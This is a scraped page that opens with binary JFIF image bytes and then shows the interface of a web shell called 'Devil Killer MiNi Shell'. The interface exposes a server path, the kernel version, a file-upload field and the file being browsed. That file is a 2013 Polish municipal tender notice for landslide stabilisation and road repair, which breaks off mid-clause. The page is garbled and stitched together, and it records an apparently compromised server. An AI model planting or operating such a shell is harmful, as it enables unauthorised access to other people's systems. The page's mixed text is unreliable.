JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130729/300986-N-2013.html

<p class="kh_header"><b>Wieprz: Stabilizacja osuwiska wraz z odbudowa drogi gminnej nr 000003 Wieprz Podgórze Wieprz Królewski w Wieprzu w km 0+130 do0+260</b><br>
<b>Numer ogłoszenia: 300986 - 2013; data zamieszczenia: 29.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wieprz , 217, 34-122 Wieprz, woj. małopolskie, tel. 033 8755100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieprz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.wieprz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Stabilizacja osuwiska wraz z odbudowa drogi gminnej nr 000003 Wieprz Podgórze Wieprz Królewski w Wieprzu w km 0+130 do0+260.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Odwodnienie
Projekt przewiduje wykonanie remontu istniejących rowów przydrożnych przez umocnienia dna i skarp rowu elementami betonowych prefabrykowanych oraz wykonanie drenażu
Francuskiego. Projektowane odwodnienia powinny odciąć dopływ wód opadowych i
płytszych wód gruntowych od koluwiów. Wody zostaną odprowadzone poza teren
osuwiska do istniejącego przepustu drogowego w km 0+ 040 z przepustu do cieku
naturalnego. W wyniku podjęcia kroków zmierzających do odwodnienia terenu osuwiska z czasem powinna nastąpi stabilizacja osuwiska. Niezbędna będzie bieżąca
konserwacja i utrzymanie drożności wszystkich urządzeń odprowadzających wodę z terenu osuwiska.
Roboty ziemne
Roboty ziemne polegają na wykonaniu wykopów pod budowle siatkowo kamienne, oczepy oraz nasypów pod konstrukcję drogi gminnej, Wykopy należy wykonać jako wykopy otwarte o ścianach pionowych. Metody wykonywania robót  wykopy (ręczne lub mechaniczne) powinny być dostosowane do głębokości wykopów, danych geotechnicznych oraz posiadanego sprzętu mechanicznego.
Wskazania dotyczące sposobu posadowienia projektowanego obiektu budowlanego
oraz dane do wzmocnienia podłoża gruntowego.
Wzmocnienie podłoża gruntowego powinna nastąpić poprzez zastosowania pali. Należy
dostosować głębokość posadowienia, konstrukcję i ilość pali stwierdzonych warunków,
w sposób zabezpieczający teren powyżej osuwiska przed poszerzeniem zasięgu w górę zbocza. Na badanym terenie zniszczenia spowodowane występowaniem procesów osuwiskowym objęły drogę gminną. Po uruchomieniu procesów osuwiskowych zagrożony jest również kościół (powyżej osuwiska) i budynki zagrodowe z budynkiem mieszkalnym, położone centralnie poniżej osuwiska na wysokości środka jego jeziora.
Prace zmierzające do stabilizacji osuwiska wpłyną korzystnie na warunki geologicznoinżynierskie.
Projektowane rozwiązanie konstrukcyjne:
przed przystąpieniem do robót należy wytyczyć punkty charakterystyczne oraz
dokonać sprawdzenia przez pomiar bezpośredni podstawowych wymiarów istniejącej
skarpy.
sprawdzić wszystkie urządzenia obce ujęte na planie zagospodarowania terenu
wszystkie materiały użyty do budowy powinny posiadać znak CE
Technologia robót
 Pale wiercone
Technologię robót należy dostosować do warunków terenowych, w szczególności
należy wziąć pod uwagę możliwości dojazdu palownicy oraz możliwości techniczne
wykonanie pali. Średnica pali została tak dobrana, by istniała możliwość wykonania
robót przy użyciu sprzętu lekkiego.
Iniekcyjne mikropale gruntowe do wykonania robót budowlanych należy zastosować
żerdzie umożliwiające jednoczesne wiercenie i iniekcję pozostawione w otworze jako
zbrojenie. Ponieważ mikropale są elementem trwałym, należy zastosować żerdzie w
powłoce jako dodatkowe zabezpieczenie antykorozyjne a elementy głowicy,
płyty oporowe, nakrętki i podkładki w ocynku.
Zabezpieczenie antykorozyjne:
Ostatni odcinek wbudowanej żerdzi ocynkowany w powłoce epoksydowej.
Płyty oporowej oraz nakrętki mocujące i podkładki cynkowe ogniowe grubości
ocynku min. 120.
Mikropale zespalane są z otaczającym gruntem za pomocą buławy iniekcyjnej,
Utworzonej z zaczynu cementowego w c = 0,4 0,5. zaczyn podawany jest pod
ciśnieniem 5 30 bar.
W celu stabilizacji powstałego obsuwiska oraz uszkodzeń drogi gminnej
konieczne są szybkie i skuteczne zabezpieczenia. Zaprojektowano wzmocnienie
stateczności zbocza z pali pionowych wierconych o średnicy 40 cm oraz iniekcyjnych
kotew gruntowych (mikropali) wykonywanych przy zastosowaniu żerdzi samo
zwieńczonych oczepem żelbetowym o długości 70 m.
W istniejącej sytuacji morfologicznej najbardziej racjonalną technologią palisady
zastosowanie techniki pali wierconych oraz technologii mikropali iniekcyjnych
z żerdzi samo wiercących zabezpieczenie uwzględnia powstanie osuwiska za palisadą z walcowymi płaszczyznami poślizgu dochodzącymi do głębokości ok. 12,0m
Wzmocnienie stateczności zbocza
Pale pionowe należy wykonać o średnicy 400 mm i długości 12,0m, zbrojone
dwuteownikami HEB h=200 mm na całej długości w rozstawie osiowym co 1,50m.
Pale ukośne należy wykonać z żerdzi samowiercących 40 na 16, średnica koronki
min165 mm z pozostawieniem żerdzi jako zbrojenia, o długości 15,0m w rozstawie co
3,0m (pomiędzy palami pionowymi). Zbrojenie pali wynika z warunku sił ścinających
oraz momentów zginających. W celu zwieńczenia głowic pali górne odcinki należy
zakotwić w belce oczepowej na długości min. 50cm. Zbrojenie belki oczepowej o
przekroju 70x140cm  8 prętów fi20 mm (stal AIIIN BSt500), strzemiona fi 8 co 30cm,
pręty przeciwskurczowe 4 fi 8, beton C25 30. Długość pali wynika z położenia płaszczyzn poślizgu, które zalegają w tym rejonie do głębokości około 6,0m oraz z potrzebnego
zagłębienia w warstwie nienaruszonego podłoża skalnego (skały twardej piaskowca)
wynoszącego min. 2.0m. Pale należy wykonać o długości gwarantującej zagłębienia w
warstwę trzeciorzędowych piaskowców na głębokość min. 2.0 m. W przypadku nie
osiągnięcia dla projektowanej długości pala minimalnego zagłębienia w tej warstwie, trzon pala należy wydłużyć tak aby spełnić powyższy warunek. W przypadku braku możliwości wykonania profilowania skarpy poniżej palisady, odsłoniętą część palisady należy zabezpieczyć żelbetową ścianką dociskową o grubości min. 15cm zbrojoną siatką z prętów fi 8 o oczkach 10x10cm. Górną powierzchnię oczepu i ścianki dociskowej należy uformować w sposób zapewniający szybki odpływ wody.
Projektowane zabezpieczenie poprawi stateczność zbocza w obrębie drogi gminnej,
w obszarze objętym rozpoznaniem geologicznym, pod warunkiem odpowiedniego
odprowadzenia wód powierzchniowych i wgłębnych z obszaru zbocza. Zbocze poniżej
drogi należy odtworzyć do stanu pierwotnego poprzez ukształtowanie odpowiednich
spadków eliminujących tworzenie się zastoisk wodnych.
Sposób prowadzenia robót nie powoduje naruszenia stanu środowiska naturalnego.
Nie występuje również ingerencja w krajobraz. Projektowany rozstaw pali nie zakłóci
przepływu wody w niższych warstwach podłoża. Użyte do wykonania robót materiały są obojętne dla środowiska naturalnego.
Zabezpieczenie konstrukcyjne obejmuje:
wykonanie wzmocnienia korpusu w skarpie drogowej (równolegle do osi drogi, w
odległości 2.8 m) składającej się z pali pionowych (szt.47) i mikropali iniekcyjnych
skośnych (szt. 24) zwieńczonych oczepem żelbetowym, profilowanie skarpy do stanu
pierwotnego, humusowanie i obsiew skarpy poniżej drogi.
Wzmocnienie podłoża gruntowego
W obrębie dolnej części osuwiska przewidziano wykonanie budowli siatkowo kamiennych w celu wzmocnienia podłoża gruntowego, stateczność zbocza i powstrzymanie ruchów osuwiskowych. Zmianę rozkładu sił działających na terenie, na którym projektuje  się wykonanie zabezpieczeń.
Budowle siatkowo kamiennych używa się do stabilizacji skarp korony drogi.
Budowle te tworzy się z elementów wykonanych z siatek i wypełnionych kamieniem
łamanym. Kosze siatkowe kamienne wykonywane są z siatek o oczkach 80 x 100 mm ,
plecionych z drutów o średnicy 2,7 i 3,0 mm lub 2,7 mm. Kosze posiadają kształt
prostopadłościanu. Podstawową konstrukcję stanowi siatka dolna ,siatki boczne i siatka pokrywająca (wieko) Konstrukcje siatkowo kamienne ,wykonane są z odpowiednio ukształtowanych skrzyń siatkowych , wypełnionych w miejscu wbudowania kamieniem łamanym o grubości 6 na 8  15 na 18 cm. Materiał służący do wypełniania koszy to kamień skała twarda, nie zwietrzała , nie rozpuszczalna w wodzie. Skrzynie siatkowe ustawia się obok siebie ,a przyległe krawędzie dolne i pionowe sąsiednich skrzyń wiąże się mocno drutem. W ten sposób tworzy się jednolite, ciągłe, podatne i elastyczne bloki. Siatki należy układać na wyrównanym podłożu, podsypce żwirowej i chudym betonie grubości 10 cm
Przed wypełnieniem koszy kamieniem wzmocnić z zewnątrz prowizorycznym
deskowaniem, aby ich ściany i górne krawędzie nie wyginały się. Materiał wypełniający
należy w skrzyniach odpowiednio wyrównać. Po wypełnieniu skrzyń zamyka
się pokrywy, mocuje się drutem do ścianki skrzyni oraz wiąże przyległe, wierzchnie
krawędzie. W projekcie przewidziano trzy rzędy koszy siatkowo  kamiennymi o
wymiarach 1.0 x 1.0 m na odcinku L= 82.0 mb kotwione mikropalami gruntowymi na
głębokość 1.5 m co 5.0 m.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2, 45.23.31.40-2, 45.23.32.23-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Przed upływem terminu składania ofert Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 15 000, 00 zł (słownie: piętnascie tysięcy złotych); w jednej lub kilku następujących formach:
a)pieniądzu
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
c)gwarancjach bankowych
d)gwarancjach ubezpieczeniowych
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 
 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
 Przedsiębiorczości (Dz. U. nr 109 poz. 1158 z późn. zm.). 
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego pn. - Urząd Gminy Wieprz w Wieprzu - ING Bank Śląski nr 92 1050 1100 1000 0022 7925 7394 w takim czasie  aby pieniądze znalazły się na rachunku Zamawiającego najpóźniej przed upływem terminu składania ofert. Do oferty należy dołączyć potwierdzenie wpłaty - wyciąg bankowy. 
W przypadku złożenia wadium w innej formie niż pieniężna, oryginał dowodu wniesienia wadium musi zostać złożony wraz z ofertą, przy czym oryginał może być złożony w oddzielnej kopercie jeżeli Wykonawca będzie żądał jego zwrotu po zakończeniu postępowania, a w takim przypadku kserokopia potwierdzona za zgodność z oryginałem złączona musi być wraz z ofertą.
2.Wadium winno obejmować cały okres związania ofertą.   
3.Zamawiający przechowa a następnie dokona zwrotu lub zatrzyma wadium zgodnie z warunkami określonymi w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24. ust. 1 pkt. 2 ustawy Pzp, w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.
Ocena spełnienia powyższych warunków udziału w postępowaniu dokonywana będzie metodą 0-1, tj. spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających warunkom postawionym w pkt. V. 3 niniejszej SIWZ wg załącznika nr 4 do niniejszej SIWZ wraz z załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone
Ocena spełnienia powyższych warunków udziału w postępowaniu dokonywana będzie metodą 0-1, tj. spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie - informację o osobach przewidzianych do realizacji zamówienia w tym kierownik budowy wg załącznika nr 3 do niniejszej SIWZ.
Ocena spełnienia powyższych warunków udziału w postępowaniu dokonywana będzie metodą 0-1, tj. spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonywana będzie metodą 0-1, tj. spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy - w zakresie :
1.1. zmiany kierownika budowy
1.1.1. Wykonawca może dokonać zmiany kierownika budowy wskazanego w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego. Wykonawca z własnej inicjatywy proponuje zmianę kierownika budowy w następujących przypadkach :
- śmierci, choroby lub innych zdarzeń losowych kierownika budowy,
- niewywiązywania się  przez kierownika budowy z obowiązków wynikających z umowy,
- konieczności zmiany z innych przyczyn niezależnych od Wykonawcy ( np. rezygnacja ,itp. )
